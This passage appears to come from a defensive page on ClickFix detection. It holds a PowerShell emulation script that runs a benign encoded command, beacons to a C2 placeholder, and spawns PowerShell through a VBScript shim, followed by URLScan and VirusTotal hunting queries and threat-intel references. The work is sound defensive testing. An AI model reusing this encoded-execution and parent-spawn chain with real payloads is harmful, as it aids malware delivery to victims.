$EncodedCmd = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($BenignCmd))
Write-Verbose "    Encoded payload (benign): $EncodedCmd"
$result = powershell.exe -NonInteractive -NoProfile -EncodedCommand $EncodedCmd
Write-Ok "Encoded command executed. Output: $($result.Trim())"
Start-Sleep -Milliseconds 300

Write-Step "Step 2/3 — DNS resolution + outbound HTTP connection from interpreter"
try {
    $null = [System.Net.Dns]::GetHostAddresses('example.com')
    Write-Ok "DNS resolved example.com (Sysmon EID 22 generated)"
} catch {
    Write-Warn "DNS resolution failed: $_"
}
try {
    $resp = Invoke-WebRequest -Uri $C2Endpoint -Method HEAD -TimeoutSec 10 `
        -UseBasicParsing -ErrorAction Stop
    Write-Ok "Outbound connection made (HTTP $($resp.StatusCode)) — Sysmon EID 3 generated"
} catch {
    Write-Warn "Network request failed (telemetry may still fire): $_"
}
Start-Sleep -Milliseconds 300

# This is what makes Hunt/Analyst rules fire — browser/scripting parent spawning PowerShell
if ($UseVbsShim) {
    Write-Step "Step 3/3 — Spawning PowerShell via VBScript shim (browser parent simulation)"
    Write-Verbose "    Note: For full browser parent (chrome.exe → powershell.exe), manually:"
    Write-Verbose "      1. Open Chrome, press F12 → Console"
    Write-Verbose "      2. This script cannot automate that chain safely"
    # VBScript spawns PowerShell with encoded command — simulates wscript.exe parent chain
    $InnerEncoded = [Convert]::ToBase64String(
        [System.Text.Encoding]::Unicode.GetBytes('Write-Host "ClickFix emulation - child of wscript"')
    )
    $VbsContent = @"
Dim oShell
Set oShell = CreateObject("WScript.Shell")
oShell.Run "powershell.exe -NonInteractive -NoProfile -EncodedCommand $InnerEncoded", 0, True
"@
    Set-Content -Path $VbsShimPath -Value $VbsContent -Encoding ASCII
    Write-Ok "VBS shim written to $VbsShimPath"
    try {
        $proc = Start-Process -FilePath 'wscript.exe' -ArgumentList "`"$VbsShimPath`"" `
            -Wait -PassThru -ErrorAction Stop
        Write-Ok "VBScript → PowerShell chain executed (wscript.exe PID $($proc.Id))"
        Write-Ok "Expected parent chain in telemetry: wscript.exe → powershell.exe"
    } catch {
        Write-Warn "VBS shim execution failed: $_"
    }
} else {
    Write-Warn "Step 3 skipped (run with -UseVbsShim for Hunt/Analyst parent chain simulation)"
    Write-Warn "For full Analyst rule validation, Hunt parent chain requires browser context."
    Write-Host ""
    Write-Host "  Manual Hunt/Analyst test:" -ForegroundColor DarkGray
    Write-Host "    1. Open Chrome/Edge DevTools console" -ForegroundColor DarkGray
    Write-Host "    2. Paste: powershell.exe -enc $EncodedCmd" -ForegroundColor DarkGray
    Write-Host "    3. Check Sysmon EID 1 for ParentImage=chrome.exe" -ForegroundColor DarkGray
}

Write-Host ""
Write-Step "Cleaning up artefacts"
Remove-Artefacts

Write-Host ""
Write-Host "=== Emulation Complete ===" -ForegroundColor Magenta
Write-Host ""
Write-Host "Expected detections:" -ForegroundColor White
Write-Host "  [Research] Sysmon EID 1 (powershell w/ -enc) + EID 3 (outbound network)" -ForegroundColor DarkCyan
Write-Host "  [Hunt]     EID 1 parent=wscript/browser + EID 3 within 60s" -ForegroundColor DarkYellow
Write-Host "  [Analyst]  EID 1 (-enc, browser parent) + EID 3 (external) + EID 22 (DNS)" -ForegroundColor DarkGreen
Write-Host ""
Write-Host "If no alerts fired, verify:" -ForegroundColor DarkGray
Write-Host "  - Sysmon config captures EID 1 (all process creation) and EID 3 (network)"
Write-Host "  - Process creation command-line logging enabled in Sysmon config"
Write-Host "  - DNS logging enabled (EID 22) in Sysmon config"
Write-Host ""
OSINT Sources
- URLScan: (page.body:navigator.clipboard OR page.body:ClipboardItem) AND (page.title:*verify* OR page.title:*update* OR page.title:*captcha*)
  Clipboard API presence anchored to deceptive page titles; retains cross-variant resilience while reducing false positives from the Clipboard API alone.
- URLScan: page.body:"I am not a robot" AND page.body:navigator.clipboard
  Fake CAPTCHA pages that write to the clipboard — the canonical ClickFix lure UI; high precision across Google reCAPTCHA and Cloudflare impersonation variants.
- URLScan: page.body:navigator.clipboard AND (page.body:"Win+R" OR page.body:"Windows key" OR page.body:"Run dialog" OR page.body:"Ctrl+V")
  Targets pages instructing users to open the Run dialog or paste commands — the execution instruction unique to ClickFix and its variants.
- VirusTotal Intelligence: behavior_processes:"nslookup.exe" tag:powershell
  Requires a VT Intelligence subscription; targets DNS-based ClickFix staging where nslookup retrieves the payload instead of a direct HTTP download.
- VirusTotal Intelligence: behavior_processes:"powershell.exe" behavior_command_line:"-enc" tag:dropper
  Requires a VT Intelligence subscription; finds encoded PowerShell droppers consistent with ClickFix payload obfuscation patterns.
Intel Resources
- Proofpoint — ClickFix Social Engineering Technique Floods Threat Landscape — Original Proofpoint research naming and first documenting ClickFix; covers TA571 initial campaigns and early payload taxonomy
- Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix — Documents APT28, MuddyWater (TA450), Kimsuky (TA427), and UNK_RemoteRogue adoption of ClickFix between October 2024 and February 2025
- Microsoft Security Blog — Think Before You ClickFix — Comprehensive Microsoft Threat Intelligence analysis covering technique mechanics, nation-state adoption, and the commercialization of ClickFix builders on hacker forums
- Huntress — Don't Sweat the ClickFix Techniques — Primary reference for the ClickFix variant taxonomy (FileFix, TerminalFix, DownloadFix); explains why the chokepoint is stable across all variants
- MITRE ATT&CK — T1204.004 User Execution: Malicious Copy and Paste — Official technique definition added March 18, 2025; procedure examples and detection guidance specific to clipboard-based social engineering
- ClickGrab — Community-sourced payload collection from active ClickFix infrastructure. Plug payloads directly into threat hunting queries to identify indicators in your environment. See intel/clickgrab.md for usage guidance.
- Matt Graeber — Microsoft.Windows.OLE.Clipboard ETW Provider — Discovery and documentation of the OLE Clipboard ETW provider (GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e); foundational reference for clipboard write ETW monitoring and ClickFix pre-execution detection
- Mandiant — SilkETW — C# ETW wrapper for security telemetry; enables Microsoft-Windows-Win32k and OLE Clipboard provider monitoring with JSON output and Windows Event Log forwarding; required infrastructure for the ETW clipboard detection layer
- phish.report — IOK Rule Reference — IOK (Indicator of Kit) rule format documentation; Sigma-based syntax for detecting phishing and lure page infrastructure; community rule feed at phish.report/IOK; supports html, js, dom, requests, and headers matchers